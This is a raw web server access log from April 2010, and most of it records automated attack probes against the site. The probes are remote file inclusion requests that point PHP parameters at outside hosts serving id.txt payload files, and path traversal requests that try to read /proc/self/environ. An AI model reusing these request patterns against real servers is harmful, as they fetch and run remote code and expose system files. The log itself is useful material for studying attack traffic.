67.195.114.252 - - [16/Apr/2010:03:40:20 -0400] "GET /logs/error_log.Q109082100 HTTP/1.0" 200 3757290 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
88.191.94.188 - - [16/Apr/2010:03:41:05 -0400] "GET /logs/error_log.Q109090600//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
88.191.94.188 - - [16/Apr/2010:03:41:05 -0400] "GET /logs/access_log.Q109120500//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:03:41:22 -0400] "GET /////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 203 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:03:41:22 -0400] "GET /logs/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:03:41:22 -0400] "GET /logs/access_log.Q109123100%20%20/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:03:41:28 -0400] "GET /////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 203 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:03:41:28 -0400] "GET /logs/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:03:41:28 -0400] "GET /logs/access_log.Q109123100%20%20/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:03:41:32 -0400] "GET /logs/access_log.Q109090300%20%20/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:03:41:34 -0400] "GET /logs/access_log.Q109090300%20%20/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Apr/2010:03:42:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.39.130.176 - - [16/Apr/2010:03:42:17 -0400] "GET /////_?SERVER[DOCUMENT_ROOT]=http://lemoland.ru/forum/images/id1.txt????? HTTP/1.1" 404 203 "-" "Mozilla/5.0"
211.39.130.176 - - [16/Apr/2010:03:42:18 -0400] "GET /logs/////_?SERVER[DOCUMENT_ROOT]=http://lemoland.ru/forum/images/id1.txt????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.39.130.176 - - [16/Apr/2010:03:42:18 -0400] "GET /logs/access_log.Q110012600/////_?SERVER[DOCUMENT_ROOT]=http://lemoland.ru/forum/images/id1.txt????? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.121.30.111 - - [16/Apr/2010:03:42:36 -0400] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
82.102.6.110 - - [16/Apr/2010:03:42:37 -0400] "GET /////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 203 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:03:42:37 -0400] "GET /logs/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:03:42:37 -0400] "GET /logs/access_log.Q109123100%20%20/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:03:42:38 -0400] "GET /////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 203 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:03:42:38 -0400] "GET /logs/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:03:42:38 -0400] "GET /logs/access_log.Q109123100%20%20/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:03:42:40 -0400] "GET /logs/error_log.Q109092400///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:03:42:40 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:03:42:40 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:03:42:42 -0400] "GET /logs/access_log.Q109052200///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:03:42:43 -0400] "GET /////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 203 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:03:42:43 -0400] "GET /logs/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:03:42:43 -0400] "GET /logs/access_log.Q109123100%20%20/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:03:42:44 -0400] "GET /////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 203 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:03:42:44 -0400] "GET /logs/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:03:42:44 -0400] "GET /logs/access_log.Q109123100%20%20/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:03:42:47 -0400] "GET /logs/access_log.Q109090300%20%20/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:03:42:47 -0400] "GET /logs/access_log.Q109090300%20%20/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:03:42:50 -0400] "GET /logs/access_log.Q109090300%20%20/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:03:42:51 -0400] "GET /logs/access_log.Q109090300%20%20/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
217.73.226.100 - - [16/Apr/2010:03:43:06 -0400] "GET /////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 203 "-" "Mozilla/5.0"
217.73.226.100 - - [16/Apr/2010:03:43:06 -0400] "GET /logs/access_log.Q110012600/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
217.73.226.100 - - [16/Apr/2010:03:43:06 -0400] "GET /logs/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.73.226.100 - - [16/Apr/2010:03:43:07 -0400] "GET /logs/access_log.Q110012600/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
217.73.226.100 - - [16/Apr/2010:03:43:07 -0400] "GET /logs/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.73.226.100 - - [16/Apr/2010:03:43:07 -0400] "GET /////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 203 "-" "Mozilla/5.0"
217.73.226.100 - - [16/Apr/2010:03:43:08 -0400] "GET /logs/access_log.Q110012600/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
217.73.226.100 - - [16/Apr/2010:03:43:08 -0400] "GET /logs/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.73.226.100 - - [16/Apr/2010:03:43:08 -0400] "GET /////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 203 "-" "Mozilla/5.0"
217.73.226.100 - - [16/Apr/2010:03:43:09 -0400] "GET /////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 203 "-" "Mozilla/5.0"
217.73.226.100 - - [16/Apr/2010:03:43:09 -0400] "GET /logs/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.73.226.100 - - [16/Apr/2010:03:43:09 -0400] "GET /logs/access_log.Q110012600/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
79.170.45.162 - - [16/Apr/2010:03:43:47 -0400] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
91.121.30.111 - - [16/Apr/2010:03:43:58 -0400] "GET /logs/error_log.Q110040500/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
91.121.30.111 - - [16/Apr/2010:03:44:00 -0400] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
91.121.30.111 - - [16/Apr/2010:03:44:00 -0400] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
60.248.160.127 - - [16/Apr/2010:03:44:09 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)"
60.248.160.127 - - [16/Apr/2010:03:44:09 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)"
60.248.160.127 - - [16/Apr/2010:03:44:13 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)"
60.248.160.127 - - [16/Apr/2010:03:44:13 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)"
217.73.226.100 - - [16/Apr/2010:03:44:35 -0400] "GET /logs/access_log.Q110012600%20%20/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:44:57 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:44:58 -0400] "GET /logs/access_log.Q109071600%20%20///vwar/backup/errors.php?error=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:44:58 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:44:58 -0400] "GET /logs/access_log.Q109071600%20%20///vwar/backup/errors.php?error=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:44:58 -0400] "GET ///vwar/backup/errors.php?error=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:44:58 -0400] "GET ///vwar/backup/errors.php?error=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:44:58 -0400] "GET ///vwar/backup/errors.php?error=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:44:58 -0400] "GET /logs/access_log.Q109071600%20%20///vwar/backup/errors.php?error=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:44:58 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:45:48 -0400] "GET /logs/access_log.Q110013100%20%20///vwar/backup/errors.php?error=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:45:48 -0400] "GET /logs/access_log.Q110013100%20%20///vwar/backup/errors.php?error=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:45:48 -0400] "GET /logs/access_log.Q110013100%20%20///vwar/backup/errors.php?error=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
79.170.45.162 - - [16/Apr/2010:03:45:50 -0400] "GET /logs/error_log.Q110040500/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
79.170.45.162 - - [16/Apr/2010:03:45:50 -0400] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
79.170.45.162 - - [16/Apr/2010:03:45:50 -0400] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
217.73.226.100 - - [16/Apr/2010:03:45:57 -0400] "GET /logs/access_log.Q110012600%20%20/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
66.249.67.232 - - [16/Apr/2010:03:46:19 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01521D5E33328800073D047+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.73.226.100 - - [16/Apr/2010:03:46:31 -0400] "GET /logs/access_log.Q110012600%20%20/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:47:17 -0400] "GET /logs/access_log.Q110040600/?sourcedir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:47:22 -0400] "GET /logs/access_log.Q110040600/?sourcedir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
78.110.50.133 - - [16/Apr/2010:03:47:24 -0400] "GET /logs/access_log.Q110040600/?sourcedir=http://www.fruehaufsteher.de/hpmaker/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.121.30.111 - - [16/Apr/2010:03:47:24 -0400] "GET /logs/error_log.Q110040500/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
91.121.30.111 - - [16/Apr/2010:03:47:24 -0400] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
91.121.30.111 - - [16/Apr/2010:03:47:24 -0400] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
217.73.226.100 - - [16/Apr/2010:03:47:34 -0400] "GET /logs/access_log.Q110012600%20%20/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
91.121.30.111 - - [16/Apr/2010:03:47:45 -0400] "GET /logs/access_log.Q110022500/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
61.84.68.4 - - [16/Apr/2010:03:47:59 -0400] "GET /logs/config.php?path_to_root=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:03:47:59 -0400] "GET /config.php?path_to_root=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:03:47:59 -0400] "GET /logs/access_log.Q109070300/config.php?path_to_root=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:03:48:34 -0400] "GET /logs//index1.php?pathtoashnews=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:03:48:34 -0400] "GET //index1.php?pathtoashnews=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:03:48:34 -0400] "GET /logs/access_log.Q109071600//index1.php?pathtoashnews=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:03:48:35 -0400] "GET /logs//config/dbutil.bck.php?confdir=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:03:48:35 -0400] "GET //config/dbutil.bck.php?confdir=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:03:48:35 -0400] "GET /logs/error_log.Q109081800//config/dbutil.bck.php?confdir=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:03:48:37 -0400] "GET //config/dbutil.bck.php?confdir=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:03:48:37 -0400] "GET /logs//config/dbutil.bck.php?confdir=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:03:48:37 -0400] "GET /logs/error_log.Q109081800//config/dbutil.bck.php?confdir=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:03:49:12 -0400] "GET /logs/error_log.Q109082600%20%20//config/dbutil.bck.php?confdir=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:03:49:14 -0400] "GET /logs/error_log.Q109082600%20%20//config/dbutil.bck.php?confdir=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:03:49:18 -0400] "GET /logs/access_log.Q109081300%20%20//config/dbutil.bck.php?confdir=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:03:49:20 -0400] "GET /logs/access_log.Q109081300%20%20//config/dbutil.bck.php?confdir=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
91.121.30.111 - - [16/Apr/2010:03:49:20 -0400] "GET /logs/access_log.Q110022500/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
79.170.45.162 - - [16/Apr/2010:03:50:04 -0400] "GET /logs/error_log.Q110040500/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
79.170.45.162 - - [16/Apr/2010:03:50:05 -0400] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
79.170.45.162 - - [16/Apr/2010:03:50:05 -0400] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
209.59.12.99 - - [16/Apr/2010:03:50:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
78.189.49.244 - - [16/Apr/2010:03:50:03 -0400] "GET /logs/error_log.Q109051400 HTTP/1.1" 200 4548402 "http://www.google.com.tr/url?sa=t&source=web&ct=res&cd=57&ved=0CCkQFjAGODI&url=http%3A%2F%2Fwww.aceonlinestore.com%2Flogs%2Ferror_log.Q109051400&rct=j&q=inurl:error_log&ei=VBfIS5mVCcKG-Qb62JDsCg&usg=AFQjCNFMK86gaoU0lspfHt9VNHl8nOM4SA" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
78.189.49.244 - - [16/Apr/2010:03:50:12 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
78.189.49.244 - - [16/Apr/2010:03:50:15 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
79.170.45.162 - - [16/Apr/2010:03:50:42 -0400] "GET /logs/access_log.Q110022500/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
174.121.24.1 - - [16/Apr/2010:03:51:02 -0400] "GET /logs/access_log.Q110012600/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:03:51:02 -0400] "GET /////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 203 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:03:51:02 -0400] "GET /logs/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:03:51:13 -0400] "GET /logs/access_log.Q110012600%20%20/////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:03:51:51 -0400] "GET /logs/access_log.Q109123100/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
66.249.67.232 - - [16/Apr/2010:03:51:59 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L015145510301B6008F8B01F+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
174.121.24.1 - - [16/Apr/2010:03:52:24 -0400] "GET /logs/access_log.Q109062300/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
79.170.45.162 - - [16/Apr/2010:03:52:43 -0400] "GET /logs/access_log.Q110022500/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
82.102.6.110 - - [16/Apr/2010:03:53:04 -0400] "GET /logs/access_log.Q109123100/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:03:53:04 -0400] "GET /logs/access_log.Q109090300/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:03:53:05 -0400] "GET /logs/access_log.Q109123100/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:03:53:06 -0400] "GET /logs/access_log.Q109123100/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:03:53:09 -0400] "GET /logs/access_log.Q109090300/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:03:53:10 -0400] "GET /logs/access_log.Q109090300/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.195.114.252 - - [16/Apr/2010:03:52:54 -0400] "GET /logs/error_log.Q110011500 HTTP/1.0" 200 3965046 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
82.102.6.110 - - [16/Apr/2010:03:53:17 -0400] "GET /logs/access_log.Q109123100/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:03:53:22 -0400] "GET /logs/access_log.Q109090300/////_?SERVER[DOCUMENT_ROOT]=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:03:53:24 -0400] "GET /logs/access_log.Q109072300//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
67.195.114.252 - - [16/Apr/2010:03:53:15 -0400] "GET /logs/error_log.Q110011500 HTTP/1.0" 200 3965046 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.247.178.106 - - [16/Apr/2010:03:53:44 -0400] "GET /////_?SERVER[DOCUMENT_ROOT]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 203 "-" "Mozilla/5.0"
